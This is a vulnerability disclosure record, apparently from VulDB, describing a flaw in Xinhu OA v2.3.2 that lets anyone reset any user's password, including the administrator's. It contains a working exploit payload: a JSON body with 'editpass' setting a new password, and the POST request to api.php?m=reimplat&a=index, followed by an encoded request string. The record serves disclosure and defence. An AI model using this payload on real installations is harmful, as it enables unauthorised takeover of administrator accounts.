| Title | Any user's password modification vulnerability in Xinhuo OA V2.3.2 |
|---|---|
| Description | Xinghu OA v2.3.2 has a vulnerability that allows changing the password of any user from the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend.<br>1. The payload generated to change the password is as follows:<br>The data passed in is `$data='{"msgtype":"editpass","user":"rock","pass":"123"}';`, where `user` is the username and `pass` is the password to be set.<br>2. Send the request packet:<br>`POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1`<br>31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g |
| Source | ⚠️ https://github.com/magicwave18/vuldb/issues/1 |
| User | magicwave18 (UID 52598) |
| Submitted | 2023-09-24 12:47 (3 years ago) |
| Moderation | 2023-09-29 16:27 (5 days later) |
| Status | Accepted |
| VulDB entry | 240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index privilege escalation] |
| Points | 20 |